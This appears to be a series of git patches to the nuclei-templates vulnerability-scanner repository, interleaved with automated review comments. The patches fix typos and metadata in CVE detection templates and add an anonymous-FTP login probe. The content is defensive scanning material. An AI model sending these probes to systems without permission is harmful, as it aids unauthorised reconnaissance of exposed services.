@@ -11,7 +11,7 @@ on: jobs: build: runs-on: ubuntu-latest - if: github.repository == 'projectdiscovery/nuclei-templates' + if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master' steps: - name: Install tree run: sudo apt-get install tree -y From 37eb31b8ccdb1545293358f8ba5eda2a6021a156 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 15:36:56 +0200 Subject: [PATCH 348/370] =?UTF-8?q?=E2=80=93=20instead=20of=20-?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2020/CVE-2020–26073.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020–26073.yaml b/cves/2020/CVE-2020–26073.yaml index 3b06a803ef..2c2fab40c1 100644 --- a/cves/2020/CVE-2020–26073.yaml +++ b/cves/2020/CVE-2020–26073.yaml @@ -3,7 +3,7 @@ info: name: Cisco SD-WAN vManage Software Directory Traversal author: madrobot severity: high - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020–26073 + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073 tags: Directory Traversal requests: From 99b468a720b7a7351da9ba237b96842fcca27959 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 15:37:53 +0200 Subject: [PATCH 349/370] Make the information more informative --- cves/2020/CVE-2020–26073.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020–26073.yaml b/cves/2020/CVE-2020–26073.yaml index 2c2fab40c1..b6c4926400 100644 --- a/cves/2020/CVE-2020–26073.yaml +++ b/cves/2020/CVE-2020–26073.yaml 
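Review bot: The added `github.ref == 'refs/heads/master'` condition works, but a job-level `if` still schedules a run that is then skipped for every push to another branch; if the `on:` block above this hunk is a `push` trigger, a `branches: [master]` filter there expresses the same intent at the trigger and avoids the empty runs. A short comment above the `if:` line stating that the README auto-commit must only happen on the default branch would help, since the reason is not obvious from the expression itself.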
@@ -3,7 +3,11 @@ info: name: Cisco SD-WAN vManage Software Directory Traversal author: madrobot severity: high - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073 + description: > + A vulnerability in the application data endpoints of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to gain access to sensitive information. + + The vulnerability is due to improper validation of directory traversal character sequences within requests to application programmatic interfaces (APIs). An attacker could exploit this vulnerability by sending malicious requests to an API within the affected application. A successful exploit could allow the attacker to conduct directory traversal attacks and gain access to sensitive information including credentials or user tokens. + reference: https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html tags: Directory Traversal requests: From d3850711008e52dba718fce3cb909c9ce4e53460 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 15:38:37 +0200 Subject: [PATCH 350/370] =?UTF-8?q?Instead=20of=20-=20used=20=E2=80=93?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2020/CVE-2020–26073.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020–26073.yaml b/cves/2020/CVE-2020–26073.yaml index b6c4926400..0b37b522c0 100644 --- a/cves/2020/CVE-2020–26073.yaml +++ b/cves/2020/CVE-2020–26073.yaml 
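Review bot: The `tags: Directory Traversal` context line in CVE-2020–26073 does not follow the lowercase, comma-separated tag convention used by the other templates in this series (for example `cve,cve2017,trixbox,traversal`), so tag-based filtering will not find this template alongside the others; `tags: cve,cve2020,cisco,traversal` would match the convention. Worth fixing while the `info` block is being reworked here.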
@@ -1,11 +1,11 @@ -id: CVE-2020–26073 +id: CVE-2020-26073 info: name: Cisco SD-WAN vManage Software Directory Traversal author: madrobot severity: high description: > A vulnerability in the application data endpoints of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to gain access to sensitive information. - + The vulnerability is due to improper validation of directory traversal character sequences within requests to application programmatic interfaces (APIs). An attacker could exploit this vulnerability by sending malicious requests to an API within the affected application. A successful exploit could allow the attacker to conduct directory traversal attacks and gain access to sensitive information including credentials or user tokens. reference: https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html tags: Directory Traversal From 3d527ae3434b56a28f25b1f04a8851f9a6b28bfa Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 15:40:01 +0200 Subject: [PATCH 351/370] Use | to not supress newline --- cves/2020/CVE-2020–26073.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020–26073.yaml b/cves/2020/CVE-2020–26073.yaml index 0b37b522c0..d40f3127f8 100644 --- a/cves/2020/CVE-2020–26073.yaml +++ b/cves/2020/CVE-2020–26073.yaml 
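Review bot: The `id` now uses an ASCII hyphen, but the file is still `cves/2020/CVE-2020–26073.yaml` with an en dash (U+2013) in its name, as the diff header shows, so the path no longer matches the template id and is awkward to type or grep; rename it to `cves/2020/CVE-2020-26073.yaml` in the same change.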
@@ -3,7 +3,7 @@ info: name: Cisco SD-WAN vManage Software Directory Traversal author: madrobot severity: high - description: > + description: | A vulnerability in the application data endpoints of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to gain access to sensitive information. The vulnerability is due to improper validation of directory traversal character sequences within requests to application programmatic interfaces (APIs). An attacker could exploit this vulnerability by sending malicious requests to an API within the affected application. A successful exploit could allow the attacker to conduct directory traversal attacks and gain access to sensitive information including credentials or user tokens. From d4fd77e9e5da80311a1a60d49bb98774c6597f77 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Mar 2021 13:58:06 +0000 Subject: [PATCH 352/370] Auto Update README [Wed Mar 10 13:58:06 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index c50e07c15a..a76c05ed92 100644 --- a/README.md +++ b/README.md @@ -43,7 +43,7 @@ An overview of the nuclei template directory including number of templates assoc | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**73 directories, 704 files**. +**73 directories, 706 files**. From 06945d56a8c0e69416d6c228417dbd879cfa2381 Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 10 Mar 2021 19:33:49 +0530 Subject: [PATCH 353/370] fixing typos --- cves/2020/CVE-2020-10148.yaml | 2 +- cves/2020/CVE-2020-27986.yaml | 2 +- cves/2020/CVE-2020-35476.yaml | 2 +- cves/2021/CVE-2021-21972.yaml | 2 +- cves/2021/CVE-2021-25646.yaml | 4 ++-- exposures/configs/sftp-credentials-exposure.yaml | 2 +- vulnerabilities/jenkins/jenkins-stack-trace.yaml | 2 +- vulnerabilities/wordpress/wp-enabled-registration.yaml | 2 +- 8 files changed, 9 insertions(+), 9 deletions(-) diff --git a/cves/2020/CVE-2020-10148.yaml b/cves/2020/CVE-2020-10148.yaml index 2c1438a0e1..bdbae0fbfd 100644 --- a/cves/2020/CVE-2020-10148.yaml +++ b/cves/2020/CVE-2020-10148.yaml @@ -44,6 +44,6 @@ requests: # - "Connection String" # - "text/plain" # part: all -# condtion: and +# condition: and # # Commented matchers can be used for "SWNetPerfMon.db" file. \ No newline at end of file diff --git a/cves/2020/CVE-2020-27986.yaml b/cves/2020/CVE-2020-27986.yaml index 3accd2bd08..530368bcea 100644 --- a/cves/2020/CVE-2020-27986.yaml +++ b/cves/2020/CVE-2020-27986.yaml @@ -25,7 +25,7 @@ requests: - email.smtp_port.secured - email.smtp_username.secured part: body - condtion: and + condition: and - type: status status: - 200 diff --git a/cves/2020/CVE-2020-35476.yaml b/cves/2020/CVE-2020-35476.yaml index 38bce2988e..2311fc42f3 100644 --- a/cves/2020/CVE-2020-35476.yaml +++ b/cves/2020/CVE-2020-35476.yaml @@ -26,7 +26,7 @@ requests: - timing - cachehit part: body - condtion: and + condition: and - type: word words: - application/json diff --git a/cves/2021/CVE-2021-21972.yaml b/cves/2021/CVE-2021-21972.yaml index 247b881f6d..9b852d57e9 100644 --- a/cves/2021/CVE-2021-21972.yaml +++ b/cves/2021/CVE-2021-21972.yaml @@ -21,7 +21,7 @@ requests: words: - "VSPHERE-UI-JSESSIONID" part: header - condtion: and + condition: and - type: regex regex: - "(Install|Config) Final Progress" 
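Review bot: These spelling fixes change behaviour, not just text: `condtion` was an unknown key that the template loader presumably ignored, so the affected matchers ran with the default condition, and `condition: and` now makes them require every listed word. The templates touched here (CVE-2020-27986, CVE-2020-35476, CVE-2021-21972, and CVE-2021-25646, sftp-credentials-exposure, jenkins-stack-trace and wp-enabled-registration in the following hunks) should be re-run against a known instance to confirm they still match; the CVE-2020-10148 change sits inside a commented-out block and has no runtime effect. A strict-unmarshal or schema check in CI would reject unknown keys like this before merge rather than leaving them to be found by eye.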
diff --git a/cves/2021/CVE-2021-25646.yaml b/cves/2021/CVE-2021-25646.yaml index 8178b8dbfd..d1e7e68100 100644 --- a/cves/2021/CVE-2021-25646.yaml +++ b/cves/2021/CVE-2021-25646.yaml @@ -42,10 +42,10 @@ requests: words: - "application/json" part: header - condtion: and + condition: and - type: regex regex: - "numRowsRead" - "numRowsIndexed" part: body - condtion: and + condition: and diff --git a/exposures/configs/sftp-credentials-exposure.yaml b/exposures/configs/sftp-credentials-exposure.yaml index c9881fb540..61516e1122 100644 --- a/exposures/configs/sftp-credentials-exposure.yaml +++ b/exposures/configs/sftp-credentials-exposure.yaml @@ -19,7 +19,7 @@ requests: - "file_permissions" - "extra_list_connections" part: body - condtion: and + condition: and - type: status status: diff --git a/vulnerabilities/jenkins/jenkins-stack-trace.yaml b/vulnerabilities/jenkins/jenkins-stack-trace.yaml index 34236c1b5e..c3eec81c72 100644 --- a/vulnerabilities/jenkins/jenkins-stack-trace.yaml +++ b/vulnerabilities/jenkins/jenkins-stack-trace.yaml @@ -25,7 +25,7 @@ requests: - "java.lang.StringIndexOutOfBoundsException" - "String index out of range" part: body - condtion: and + condition: and - type: status status: - 500 diff --git a/vulnerabilities/wordpress/wp-enabled-registration.yaml b/vulnerabilities/wordpress/wp-enabled-registration.yaml index 88fb8fb184..0ba85a9d7b 100644 --- a/vulnerabilities/wordpress/wp-enabled-registration.yaml +++ b/vulnerabilities/wordpress/wp-enabled-registration.yaml @@ -17,7 +17,7 @@ requests: words: - Register For This Site - E-mail - condtion: and + condition: and part: body - type: status From cdba9196ae9553ea4d0901a42efeffb17178dcb9 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 10 Mar 2021 19:35:34 +0530 Subject: [PATCH 354/370] fixing matchers --- cves/2020/CVE-2020-35476.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) 
diff --git a/cves/2020/CVE-2020-35476.yaml b/cves/2020/CVE-2020-35476.yaml index 2311fc42f3..a73f95890b 100644 --- a/cves/2020/CVE-2020-35476.yaml +++ b/cves/2020/CVE-2020-35476.yaml @@ -20,13 +20,15 @@ requests: - type: status status: - 200 - - type: regex - regex: + + - type: word + words: - plotted - timing - cachehit part: body condition: and + - type: word words: - application/json From c65eecd3c993c86c5fb0cd30014263af553d5048 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Mar 2021 14:12:32 +0000 Subject: [PATCH 355/370] Auto Update README [Wed Mar 10 14:12:32 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index a76c05ed92..95a46b9173 100644 --- a/README.md +++ b/README.md @@ -43,7 +43,7 @@ An overview of the nuclei template directory including number of templates assoc | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**73 directories, 706 files**. +**74 directories, 710 files**. From ed91c0813e34fab94f4d048eb0a0fc2dc8cb9813 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 10 Mar 2021 19:45:41 +0530 Subject: [PATCH 356/370] more typos --- cves/2017/CVE-2017-14537.yaml | 2 +- cves/2017/CVE-2017-16877.yaml | 2 +- cves/2018/CVE-2018-16763.yaml | 2 +- cves/2018/CVE-2018-19386.yaml | 2 +- cves/2019/CVE-2019-12461.yaml | 2 +- cves/2019/CVE-2019-7256.yaml | 2 +- cves/2020/CVE-2020-27986.yaml | 2 +- vulnerabilities/other/apache-flink-unauth-rce.yaml | 2 +- vulnerabilities/other/bullwark-momentum-lfi.yaml | 2 +- vulnerabilities/other/duomicms-sql-injection.yaml | 2 +- vulnerabilities/other/finereport-path-traversal.yaml | 2 +- 11 files changed, 11 insertions(+), 11 deletions(-) diff --git a/cves/2017/CVE-2017-14537.yaml b/cves/2017/CVE-2017-14537.yaml index c2554af2f4..2cf50e99d5 100644 --- a/cves/2017/CVE-2017-14537.yaml +++ b/cves/2017/CVE-2017-14537.yaml 
@@ -6,7 +6,7 @@ info: severity: medium tags: cve,cve2017,trixbox,traversal -# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2017-14537 +# reference:-https://nvd.nist.gov/vuln/detail/CVE-2017-14537 # https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ # Product vendor:-https://sourceforge.net/projects/asteriskathome/ diff --git a/cves/2017/CVE-2017-16877.yaml b/cves/2017/CVE-2017-16877.yaml index 8e37e84ce3..2b19af42f4 100644 --- a/cves/2017/CVE-2017-16877.yaml +++ b/cves/2017/CVE-2017-16877.yaml @@ -4,7 +4,7 @@ info: name: Nextjs v2.4.1 LFI author: pikpikcu severity: high - refrence: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 + reference: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 tags: cve,cve2017,nextjs,lfi requests: diff --git a/cves/2018/CVE-2018-16763.yaml b/cves/2018/CVE-2018-16763.yaml index 6c15a7c99b..a268eb5ad9 100644 --- a/cves/2018/CVE-2018-16763.yaml +++ b/cves/2018/CVE-2018-16763.yaml @@ -8,7 +8,7 @@ info: # Vendor Homepage: https://www.getfuelcms.com/ # Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 -# Refrence: https://www.exploit-db.com/exploits/47138 +# reference: https://www.exploit-db.com/exploits/47138 requests: - raw: diff --git a/cves/2018/CVE-2018-19386.yaml b/cves/2018/CVE-2018-19386.yaml index bde787e7a0..7e686b8ceb 100644 --- a/cves/2018/CVE-2018-19386.yaml +++ b/cves/2018/CVE-2018-19386.yaml @@ -4,7 +4,7 @@ info: name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting author: pikpikcu severity: medium - refrence: https://www.cvedetails.com/cve/CVE-2018-19386/ + reference: https://www.cvedetails.com/cve/CVE-2018-19386/ tags: cve,cve2018,solarwinds,xss requests: diff --git a/cves/2019/CVE-2019-12461.yaml b/cves/2019/CVE-2019-12461.yaml index 130c2c984d..3a433fd263 100644 --- a/cves/2019/CVE-2019-12461.yaml +++ b/cves/2019/CVE-2019-12461.yaml 
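Review bot: In CVE-2017-14537 the corrected comment still keeps the reference URL in a comment rather than in the `info.reference` field that this same commit fixes for other templates, so tooling that reads `reference` will not see it; the same applies to CVE-2018-16763 in this hunk group and to CVE-2019-12461 and bullwark-momentum-lfi in the following ones. Moving the first URL to `reference: https://nvd.nist.gov/vuln/detail/CVE-2017-14537` under `info:` and keeping the remaining links as comments would make them consistent. Lower-casing `reference` in the comments also breaks with the capitalised `# Vendor Homepage:` / `# Product vendor:` labels beside it; `# Reference:` keeps the style.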
@@ -8,7 +8,7 @@ info: # Vendor Homepage: https://webport.se/ # Software Link: https://webport.se/nedladdningar/ -# Refrence: https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS +# reference: https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS requests: - method: GET diff --git a/cves/2019/CVE-2019-7256.yaml b/cves/2019/CVE-2019-7256.yaml index ec68738285..af5736eb0b 100644 --- a/cves/2019/CVE-2019-7256.yaml +++ b/cves/2019/CVE-2019-7256.yaml @@ -4,7 +4,7 @@ info: name: eMerge E3 1.00-06 - Remote Code Execution author: pikpikcu severity: critical - refrence: https://www.exploit-db.com/exploits/47619 + reference: https://www.exploit-db.com/exploits/47619 tags: cve,cve2019,emerge,rce # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ diff --git a/cves/2020/CVE-2020-27986.yaml b/cves/2020/CVE-2020-27986.yaml index 530368bcea..7b82f50f2d 100644 --- a/cves/2020/CVE-2020-27986.yaml +++ b/cves/2020/CVE-2020-27986.yaml @@ -8,7 +8,7 @@ info: SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI. NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." - refrences: https://nvd.nist.gov/vuln/detail/CVE-2020-27986 + references: https://nvd.nist.gov/vuln/detail/CVE-2020-27986 tags: cve,cve2020,sonarqube requests: diff --git a/vulnerabilities/other/apache-flink-unauth-rce.yaml b/vulnerabilities/other/apache-flink-unauth-rce.yaml index a2d53b0fee..3ff32618bf 100644 --- a/vulnerabilities/other/apache-flink-unauth-rce.yaml +++ b/vulnerabilities/other/apache-flink-unauth-rce.yaml @@ -7,7 +7,7 @@ info: reference: https://github.com/LandGrey/flink-unauth-rce tags: apache,flink,rce - # Refrence: + # reference: # https://www.exploit-db.com/exploits/48978 # https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 
diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml index 1470f0ff6f..5808207bc9 100644 --- a/vulnerabilities/other/bullwark-momentum-lfi.yaml +++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml @@ -6,7 +6,7 @@ info: severity: high tags: bullwark,lfi -# Refrence:-https://www.exploit-db.com/exploits/47773 +# reference:-https://www.exploit-db.com/exploits/47773 # Vendor Homepage: http://www.bullwark.net/ # Version : Bullwark Momentum Series Web Server JAWS/1.0 # Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 diff --git a/vulnerabilities/other/duomicms-sql-injection.yaml b/vulnerabilities/other/duomicms-sql-injection.yaml index b05a57fa60..93da2eb742 100644 --- a/vulnerabilities/other/duomicms-sql-injection.yaml +++ b/vulnerabilities/other/duomicms-sql-injection.yaml @@ -4,7 +4,7 @@ info: name: DuomiCMS SQL Injection author: pikpikcu severity: high - refrence: https://redn3ck.github.io/2016/11/01/duomiCMS/ + reference: https://redn3ck.github.io/2016/11/01/duomiCMS/ tags: duomicms,sqli requests: diff --git a/vulnerabilities/other/finereport-path-traversal.yaml b/vulnerabilities/other/finereport-path-traversal.yaml index 9fe319b5e7..95d04cac6a 100644 --- a/vulnerabilities/other/finereport-path-traversal.yaml +++ b/vulnerabilities/other/finereport-path-traversal.yaml @@ -4,7 +4,7 @@ info: name: Finereport 8.0 Path Traversal author: pikpikcu severity: medium - refrence: http://foreversong.cn/archives/1378 + reference: http://foreversong.cn/archives/1378 tags: finereport,lfi requests: From 2049542747f31e1cc7204cbd2d78d820de0fd58f Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 10 Mar 2021 20:03:06 +0530 Subject: [PATCH 357/370] Update .nuclei-ignore --- .nuclei-ignore | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.nuclei-ignore b/.nuclei-ignore index d39e13bbcc..68eed3c006 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore 
@@ -19,6 +19,6 @@ fuzzing/ # Wordlist directory contains payload to be used with templates. helpers/ miscellaneous/ - +headless/ # Workflows are excluded from default run to avoid duplicate scans. workflows/ \ No newline at end of file From db26ee650e78afb9c0ca7d3221a5590d7d0c247c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Mar 2021 20:26:28 +0000 Subject: [PATCH 358/370] Auto Update README [Wed Mar 10 20:26:28 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 95a46b9173..915f9c952f 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 235 | vulnerabilities | 105 | exposed-panels | 104 | | exposures | 61 | technologies | 50 | misconfiguration | 54 | -| workflows | 23 | miscellaneous | 16 | default-logins | 18 | +| workflows | 23 | miscellaneous | 16 | default-logins | 19 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**74 directories, 710 files**. +**75 directories, 711 files**. From 666149066316a30c48ba9f611e3a54909892ed82 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 11 Mar 2021 12:40:27 +0530 Subject: [PATCH 359/370] Adding unauth-ftp --- network/unauth-ftp.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 network/unauth-ftp.yaml diff --git a/network/unauth-ftp.yaml b/network/unauth-ftp.yaml new file mode 100644 index 0000000000..fc468fcbb9 --- /dev/null +++ b/network/unauth-ftp.yaml 
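Review bot: The new `headless/` entry is the only directory in this hunk without a comment saying why it is excluded, while its neighbours each carry one (`# Wordlist directory contains payload ...`, `# Workflows are excluded from default run ...`); a line in the same style above it, e.g. `# Headless templates are excluded from the default run.`, would keep the file self-explaining. The removed blank line was the separator before the workflows comment, so that stanza now runs straight into the previous one. The file also still ends with `\ No newline at end of file`, which this edit could have fixed while touching the tail.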
@@ -0,0 +1,22 @@ +id: unauth-ftp + +info: + name: FTP Anonymous Login + author: Celesian ( @C3l3si4n ) + severity: medium + reference: https://tools.ietf.org/html/rfc2577 + tags: network,ftp + +network: + - inputs: + - data: "USER anonymous\r\nPASS nuclei\r\n" + + host: + - "{{Hostname}}" + - "{{Hostname}}:21" + + matchers: + - type: word + words: + - "Anonymous access allowed," + part: all \ No newline at end of file From a2798f8a6aaa78b3df497710e38c7f99725b41b2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Mar 2021 07:12:19 +0000 Subject: [PATCH 360/370] Auto Update README [Thu Mar 11 07:12:19 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 915f9c952f..37d784efe8 100644 --- a/README.md +++ b/README.md @@ -43,7 +43,7 @@ An overview of the nuclei template directory including number of templates assoc | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**75 directories, 711 files**. +**75 directories, 712 files**. From d78a21a84221c396c2d630040d167c1ebfb212cb Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 11 Mar 2021 12:51:36 +0530 Subject: [PATCH 361/370] For network template specified ports are on priority --- network/exposed-redis.yaml | 1 - network/exposed-zookeeper.yaml | 1 - network/memcached-stats.yaml | 1 - network/mongodb-detect.yaml | 1 - network/mongodb-unauth.yaml | 1 - network/unauth-ftp.yaml | 1 - 6 files changed, 6 deletions(-) diff --git a/network/exposed-redis.yaml b/network/exposed-redis.yaml index ee683481cd..b3a6723804 100644 --- a/network/exposed-redis.yaml +++ b/network/exposed-redis.yaml @@ -12,7 +12,6 @@ network: - data: "info\r\nquit\r\n" host: - - "{{Hostname}}" - "{{Hostname}}:6379" read-size: 2048 diff --git a/network/exposed-zookeeper.yaml b/network/exposed-zookeeper.yaml index 027a490123..33efe6f865 100644 --- a/network/exposed-zookeeper.yaml 
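Review bot: The matcher keys on a server-specific greeting string (`"Anonymous access allowed,"`) rather than the protocol-level success reply, so an FTP server that accepts the anonymous login but phrases its greeting differently is reported as clean; matching the `230` reply code that RFC 959 defines for a completed login (e.g. an additional entry `- "230 "`) would be vendor-independent, with the current string kept as a secondary signal if desired. The template has a `reference:` to RFC 2577 but no `description:` explaining what an anonymous-login finding means for triage — a one-line description would help consumers of the output. The last line `part: all` is followed by `\ No newline at end of file`; add the trailing newline.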
+++ b/network/exposed-zookeeper.yaml @@ -12,7 +12,6 @@ network: - data: "envi\r\nquit\r\n" host: - - "{{Hostname}}" - "{{Hostname}}:2181" read-size: 2048 diff --git a/network/memcached-stats.yaml b/network/memcached-stats.yaml index 62f8e25bae..5252fd2b3f 100644 --- a/network/memcached-stats.yaml +++ b/network/memcached-stats.yaml @@ -11,7 +11,6 @@ network: - data: "stats\r\n\r\nquit\r\n" host: - - "{{Hostname}}" - "{{Hostname}}:11211" read-size: 2048 diff --git a/network/mongodb-detect.yaml b/network/mongodb-detect.yaml index 55716383b9..7ba70d3c82 100644 --- a/network/mongodb-detect.yaml +++ b/network/mongodb-detect.yaml @@ -13,7 +13,6 @@ network: type: hex host: - - "{{Hostname}}" - "{{Hostname}}:27017" read-size: 2048 diff --git a/network/mongodb-unauth.yaml b/network/mongodb-unauth.yaml index 6d8c522a1d..eccd19ea30 100644 --- a/network/mongodb-unauth.yaml +++ b/network/mongodb-unauth.yaml @@ -13,7 +13,6 @@ network: type: hex host: - - "{{Hostname}}" - "{{Hostname}}:27017" read-size: 2048 matchers: diff --git a/network/unauth-ftp.yaml b/network/unauth-ftp.yaml index fc468fcbb9..090f597c79 100644 --- a/network/unauth-ftp.yaml +++ b/network/unauth-ftp.yaml @@ -12,7 +12,6 @@ network: - data: "USER anonymous\r\nPASS nuclei\r\n" host: - - "{{Hostname}}" - "{{Hostname}}:21" matchers: From c04353a0c92f8069926ec4185bd152b1ddf0f2a0 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 11 Mar 2021 12:26:36 +0200 Subject: [PATCH 362/370] Add references --- cves/2020/CVE-2020-26214.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2020/CVE-2020-26214.yaml b/cves/2020/CVE-2020-26214.yaml index 4d3b60ac22..2f43c8cf64 100644 --- a/cves/2020/CVE-2020-26214.yaml +++ b/cves/2020/CVE-2020-26214.yaml 
@@ -5,12 +5,12 @@ info: author: CasperGN severity: critical description: Alerta prior to version 8.1.0 is prone to Authentication Bypass when using LDAP as authorization provider and the LDAP server accepts Unauthenticated Bind reqests. - reference: https://github.com/advisories/GHSA-5hmm-x8q8-w5jh + reference: + - https://github.com/advisories/GHSA-5hmm-x8q8-w5jh + - https://tools.ietf.org/html/rfc4513#section-5.1.2 + - https://pypi.org/project/alerta-server/8.1.0/ tags: cve,cve2020,alerta - # Reference: https://github.com/advisories/GHSA-5hmm-x8q8-w5jh - # Reference: https://tools.ietf.org/html/rfc4513#section-5.1.2 - requests: - method: GET path: From 7e0ec83db227d552c6b1d91c464aac8c4d5f87c0 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 11 Mar 2021 12:37:37 +0200 Subject: [PATCH 363/370] =?UTF-8?q?=E2=80=93=20=3D>=20-?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2020/CVE-2020-26073.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-26073.yaml b/cves/2020/CVE-2020-26073.yaml index e089d618b5..517b9a4891 100644 --- a/cves/2020/CVE-2020-26073.yaml +++ b/cves/2020/CVE-2020-26073.yaml @@ -1,9 +1,9 @@ -id: CVE-2020–26073 +id: CVE-2020-26073 info: name: Cisco SD-WAN vManage Software Directory Traversal author: madrobot severity: high - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020–26073 + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073 tags: cve,cve2020,cisco,lfi requests: From 0d56e864276f0e0b2afd41153ab598c9999a052e Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 11 Mar 2021 12:56:53 +0200 Subject: [PATCH 364/370] =?UTF-8?q?Replace=20=E2=80=93=20with=20-=20and=20?= =?UTF-8?q?give=20better=20references?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2020/CVE-2020-25213.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) 
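Review bot: The `description:` context line directly above the new `reference:` list still reads `Unauthenticated Bind reqests`; since this commit is already editing the `info:` block, fixing it to `Unauthenticated Bind requests` here would avoid another round-trip. Turning `reference:` into a list is a good move, but note that it now differs in shape from templates that keep a single scalar `reference:` (CVE-2020-26073 in the next commit on this page does), so any tooling that reads the field needs to accept both forms. The `requests:` block that follows begins below the hunk.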
